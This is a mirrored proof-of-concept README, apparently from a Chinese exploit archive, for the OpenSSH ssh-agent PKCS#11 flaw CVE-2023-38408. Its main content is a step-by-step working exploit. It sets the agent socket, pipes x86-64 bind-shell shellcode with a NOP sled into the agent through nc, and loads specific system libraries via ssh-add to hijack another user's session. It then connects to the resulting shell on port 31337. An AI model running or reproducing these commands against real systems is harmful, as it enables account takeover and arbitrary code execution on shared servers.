关联漏洞
标题:
OpenSSH 代码问题漏洞
(CVE-2023-38408)
描述:OpenSSH(OpenBSD Secure Shell)是加拿大OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 9.3p2之前版本存在安全漏洞,该漏洞源于ssh-agent的PKCS11功能存在安全问题。攻击者可利用该漏洞执行远程代码。
描述
Takeover Account OpenSSH
介绍
# OpenSSH Vulnerability - CVE-2023-38408 :books:
### Introduction
A vulnerability was found in OpenSSH (before 9.3p2 version). The PKCS#11 feature in the ssh-agent in OpenSSH has an insufficiently trustworthy search path, leading to remote code execution if an agent is forwarded to an attacker-controlled system (the code in /usr/lib is not necessarily safe for loading into ssh-agent). This flaw allows an attacker with control of the forwarded agent-socket on the server and the ability to write to the filesystem of the client host to execute arbitrary code with the privileges of the user running the ssh-agent.
**In the example below, we can briefly observe the steps from exploration to compromising alice's user.**
<p align="center">
<img width="700" height="400" src="./img/poc.JPG">
</p>
* Step 1 - The **Attacking** user connects via SSH to the server.
* Step 2 - The user **Alice** is also connected via ssh on the server.
* Step 3 - Attacker creates shellcode to send via ssh process to target server.
* Step 4 - The shellcode sent by the attacker exploits the PKCS#11 vulnerability of the ssh-agent and creates a new process hijacking the ssh access of the user Alice.
* Step 5 - Still through the normal access of the attacker, it is possible to execute operational commands by the user Alice, accessing the exploit created in the shellcode via nc localhost 31337.
## How to make? let's create the POC
As mentioned before, in this POC we will use 2 users connected to a server via SSH. To follow the steps below, we assume that the 2 users already have access to the server (SSH).
1. Obtain the PID of the SSH agent running on the remote attacker machine and export to an environment variable. We also added via ssh-add the file linuxx64.elf.stub (UEFI boot stub)
```
echo /tmp/ssh-*/agent.*
export SSH_AUTH_SOCK=/tmp/ssh-NqLP6il36s/agent.3452
ssh-add -s /usr/lib/systemd/boot/efi/linuxx64.elf.stub
```
<p align="center">
<img width="1000" height="200" src="./img/1.JPG">
</p>
2. now, to copy the shellcode into the process using SSH, you need to follow these steps while still on the attacking machine;
```
SHELLCODE=$'\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x7a\x69\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'
(perl -e 'print "\0\0\x27\xbf\x14\0\0\0\x10/usr/lib/modules\0\0\x27\xa6" . "\x90" x 10000'; echo -n "$SHELLCODE") | nc -U "$SSH_AUTH_SOCK"
```
<p align="center">
<img width="1000" height="100" src="./img/2.JPG">
</p>
Finally, press Ctrl-C to stop the netcat transfer once the shellcode is successfully placed in the agent's memory.
3. In this step, we are going to upload 3 files via ssh-add; ***libttcn3-rt2-dynamic.so, libKF5SonnetUi.so.5.92.0 and libns3.35-wave.so.0.0.0***. The next step to the exploitation process is register the signal handler for the Segmentation Fault (SIGSEGV) signal.
> [!NOTE]
Triggering SIGSEGV :speech_balloon:<br>
SIGSEGV is a signal known to a computer process emitted >when an invalid memory reference (segmentation fault) occurs. Upon receiving the SIGSEGV signal, the kernel recognizes that an invalid memory access has occurred and proceeds to invoke the custom signal handler rather than terminate the program abruptly. By doing so, the attacker seizes the opportunity to manipulate the program's execution and steer it toward the injected malicious code located within the NOP sled.
```
ssh-add -s /usr/lib/titan/libttcn3-rt2-dynamic.so
[Enter for passphrase]
ssh-add -s /usr/lib/x86_64-linux-gnu/libKF5SonnetUi.so.5.92.0
[Enter for passphrase]
ssh-add -s /usr/lib/x86_64-linux-gnu/libns3.35-wave.so.0.0.0
[Enter for passphrase]
```
<p align="center">
<img width="1000" height="200" src="./img/3.JPG">
</p>
4. At this point, we have already managed to exploit the user Alice via the attacker's ssh access to the server, executing the command below created by the shellcode. :fire:
```
nc localhost 31337
```
<p align="center">
<img width="1000" height="200" src="./img/4.JPG">
</p>
## Does CVE-2023-38408 affect me :question:
The vulnerability primarily affects systems where OpenSSH’s SSH-agent is in use and the agent’s forwarding feature is enabled. Organizations and individuals relying on OpenSSH should promptly assess their configurations to determine potential exposure. If your system meets the mentioned conditions, it is crucial to take immediate action to mitigate the risk associated with **CVE-2023-38408**.
文件快照
[4.0K] /data/pocs/e9c411df23c9b009c704a8e3a15869269564609f
├── [4.0K] img
│ ├── [ 31K] 1.JPG
│ ├── [ 52K] 2.JPG
│ ├── [ 39K] 3.JPG
│ ├── [ 16K] 4.JPG
│ └── [ 49K] poc.JPG
└── [4.8K] README.md
1 directory, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。